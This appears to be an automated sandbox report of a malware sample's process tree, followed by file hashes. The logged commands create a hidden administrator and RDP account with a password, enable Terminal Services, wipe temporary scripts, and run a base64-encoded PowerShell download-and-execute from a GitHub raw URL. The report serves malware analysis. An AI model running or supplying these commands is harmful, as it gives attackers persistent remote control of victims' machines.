C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2200
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3600
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3736 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3964
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3332
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3984
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1680
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc zr0Htc6U /add1⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc zr0Htc6U /add2⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc zr0Htc6U /add3⤵PID:3136
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:2316
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:960 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1244 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵PID:2352
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:2080
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc zr0Htc6U1⤵
- Suspicious use of WriteProcessMemory
PID:188 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc zr0Htc6U2⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc zr0Htc6U3⤵PID:3424
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:800 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:2320
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2136
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:1520
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3852
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2104
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
0e6b28c99adba2f5312a9e72f20eaa09
SHA14ea834bc4634e31f4785acafeef8cd04e3177ba7
SHA2563e1654d78e212b09e5ccd0fe3efa6970b2bb0a20b43aa801f76b83387d7f5976
SHA5124da3fc178e4c6c2a97221b134c9e5dc94876ddcf62f148f12596dc0851a904e9319e421b569ab65665ac3a27891a3b269bed7d5272659ad0b57ec7e06110c036
-
MD5
2145a2a46033988b1223403800143e10
SHA1b06393b4553692546176cc64bbcfef26d4b6b41a
SHA2564d2f654f6c6e49f1f34cff72cc3420df8e38aa5081b512def8e9f58e81f3829d
SHA512eb3e62dfeff2467e6b2b9199b49362a85e8e09d3546c1290de4814b32d9ec38c486c0a8012626ce779e0e0cb27c401e44081988fb5f53eadad626c0091d5d5bf
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
43473f4e719958639a9d89e5d8388999
SHA1ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA5121051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa
-
MD5
14091f6b52cce370db5e39d8806485ca
SHA1f78f3f25f42eb5a7e6df88ea26cc666bf5dd86ea
SHA25687c98d2fce893786ebbbdd4366df6ae0c6d632917aaa4185a380ceb2e49aade9
SHA512ac555f9dc08204e1dd11e7dc89fae520a001d840cce8bc45e9f7d17220c9ebbb6c62028050caa5a6e3df6d1ade81fb5666df5c738c71b22d5288579fc1ad0481
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
a23aa39741b00f368bac9a2e2574da1d
SHA10d9ccc252132f44c6142e39fe0dc6b52c15abc44
SHA2569d9a152411fb30e8378df7825d3ca80410b2bba7a43f53f68a3888bac40bd56b
SHA51232e0066ff846734e5769fcb4e7eda120c856d9062a76481b777f798a905c2d0af6e68301e77845373187e3b175558a3b1b76c6c8be060fe2b639ac0856043ba0
-
MD5
271eacd9c9ec8531912e043bc9c58a31
SHA1c86e20c2a10fd5c5bae4910a73fd62008d41233b
SHA256177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934
SHA51287375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0
-
MD5
1fa9c1e185a51b6ed443dd782b880b0d
SHA150145abf336a196183882ef960d285bd77dd3490
SHA256f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959
SHA51216bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc